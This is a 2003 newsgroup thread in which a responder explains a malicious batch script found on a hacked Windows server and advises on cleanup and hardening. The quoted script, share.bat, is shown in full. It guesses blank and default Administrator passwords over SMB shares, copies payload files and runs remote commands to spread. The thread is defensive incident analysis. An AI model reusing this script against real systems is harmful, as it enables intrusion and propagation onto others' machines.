Re: Someone hacked one of my servers

From: Karl Levinson [x y] mvp (levinson_k@despammed.com)
Date: 02/17/03

  • Next message: vagabond: "Re: Need advice wrt. unsoliciated msg and files" 
    From: "Karl Levinson [x y] mvp" <levinson_k@despammed.com>
Date: Sun, 16 Feb 2003 19:38:33 -0500

    The first few commands are trying to open a C: drive by logging in with the
    account Admin or Administrator with some very simple passwords. If one of
    these worked, you really really need a better password on all your accounts,
    especially administrator... and a firewall that blocks windows networking
    [netbios over TCP/IP, e.g. TCP and UDP 135 - 139 and 445] BOTH directions,
    not just outbound. The %1 command implies this is a batch file where the
    server name or IP address is supplied when the batch file is called, at the
    command line or by another batch file, e.g. FILENAME.BAT servername

    If you found this file on your computer, this person probably had already
    hacked a way to remotely run commands on your server which may or may not be
    related to this batch file. I'm also guessing they used the TFTP.EXE or
    FTP.EXE commands to download other files such as iserver.bat and ntadmin.exe
    and ntcmd and skill.vxd to your C:\drivers\ folder [which they probably
    created as well]. You can see file copies in the second part of this log.

    I'm guessing ntcmd.exe in the third part is something like CUSRMGR.EXE from
    the Windows Resource Kit. It looks like they attempted to create some
    accounts named Admin or Administrator to allow future access. Note that
    while these accounts may have been created on your computer, these commands
    are probably trying to create the accounts on another computer, maybe on
    your network, maybe not. I think you've got some REAL problems. There's no
    way to know what else they did to this system.

    Frequently this type of hack might come in through IIS web services, so
    check your IIS web logs if you have logging enabled. Otherwise, check your
    firewall logs [if you had a firewall.] Otherwise, you probably don't have
    any other logs that show what happened or who to try to prosecute. If
    you're a business, you might try calling the authorities [police or local
    FBI office in the US, though don't expect anything to happen unless you're a
    business with provable financial loss].

    You're doing the right thing in analyzing the system to try to prevent
    making the same mistake again. I would seriously think about formatting and
    reinstalling everything after your investigation is over.

    Firewalls and antivirus can be had for free [example www.sygate.com free
    firewall and www.grisoft.com for antivirus]. So there's no excuse.

    Here are some things you should do:

    http://securityadmin.info/faq.htm#hacked [looking for more clues to how you
    were hacked]
    http://securityadmin.info/faq.htm#iislogs2
    http://securityadmin.info/faq.htm#iislogs
    http://securityadmin.info/faq.htm#re-secure
    http://securityadmin.info/faq.htm#harden [how to harden your computer
    against this]
    http://securityadmin.info/faq.htm#firewalls

    Hope this helps. Let us know if you find anything interesting or have any
    questions.

    "Joe Kinsella" <joek@tarragonsoftware.com> wrote in message
    news:#szqwCY1CHA.1712@TK2MSFTNGP10...
    > After realizing my system was hacked, I took it offline and started to
    look
    > at what happened. I found a script called share.bat that reads as listed
    > below: Does anyone have any idea what this might be doing?
    >
    > net use \\%1\C$ "" "/user:Administrator"
    > net use \\%1\C$ "administrator" "/user:Administrator"
    > net use \\%1\C$ "admin" "/user:Administrator"
    > net use \\%1\C$ "" "/user:Admin"
    > net use \\%1\C$ "admin" "/user:Admin"
    > net use \\%1\C$ "administrator" "/user:Admin"
    > md \\%1\C$\Drivers
    > copy iserver.bat \\%1\C$\Drivers
    > copy ntadmin.exe \\%1\C$\Drivers
    > ntcmd \\%1 -u:Administrator -p: < skill.vxd
    > ntcmd \\%1 -u:Administrator -p:administrator < skill.vxd
    > ntcmd \\%1 -u:Administrator -p:admin < skill.vxd
    > ntcmd \\%1 -u:Admin -p: < skill.vxd
    > ntcmd \\%1 -u:Admin -p:admin < skill.vxd
    > ntcmd \\%1 -u:Admin -p:administrator < skill.vxd
    > net use \\%1\C$ /del
    >
    > 

    ---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.449 / Virus Database: 251 - Release Date: 1/27/2003

    Relevant Pages

    • Re: Limited accounts wont do the job
      ... >> an internal or external command, operable program or batch file". ... >>> accounts to have overall ...
      (microsoft.public.windowsxp.security_admin)
    • got it!
      ... set up a batch file in the winnt folder so i could run a series of commands ... You also have to lower the version of the policy, ... >> (you can use the scheduler to schedule remotely): ...
      (microsoft.public.win2000.security)
    • Wrote a script to insulate commands, would like to be sure its secure
      ... My initial problem was to run commands provided by non-trusted users ... who do not have a local shell account. ... I wrote a script which use a pool of unix accounts ...
      (comp.unix.shell)
    • Re: Offline Defrag command line
      ... You can also create a batch file with all the commands pre-configured ... b/c you will have the commands and syntax in the batch file. ... It makes the life of an Exchange Admin easier. ...
      (microsoft.public.exchange.admin)
    • Re: [Info-Ingres] Need Some Help
      ... Is there any limit on the number of records the copy commands ... Escrow Account and how does it protect both the seller ... Like my actaull records is Escrow ... Accounts but in text file its shown as 15Escrow Accounts ...
      (comp.databases.ingres)